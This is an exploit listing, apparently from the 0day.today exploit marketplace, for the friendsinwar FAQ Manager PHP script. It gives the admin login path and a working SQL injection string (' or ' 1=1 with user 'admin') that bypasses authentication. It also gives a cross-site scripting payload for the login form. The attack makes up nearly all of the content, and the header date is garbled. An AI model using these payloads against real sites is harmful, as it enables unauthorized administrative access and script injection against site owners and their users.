[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability

Author
d3b4g
Risk
[
Security Risk High
]
0day-ID
0day-ID-19743
Category
web applications
Date add
14-11-2012
Platform
php
# Exploit Title: friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/the_faq_manager/
# Tested on: Windows 7
# Blog: d3b4g.me

----------------------------------------------------------------------------------
     () SQL Injection :
 
 
     http://localhost/path/the_faq_manager/admin/login.php
 
     + Use following information to bypass login.
 
  
      User:admin
      
      ' or ' 1=1
 
 
      () Cross Site Scripting:
 
       XSS in loging form, insert follwing JS code to loging follwing.
 
     '"()&%1<ScRiPt >prompt(952226)</ScRiPt>
 

-end-

#  0day.today [2024-09-29]  #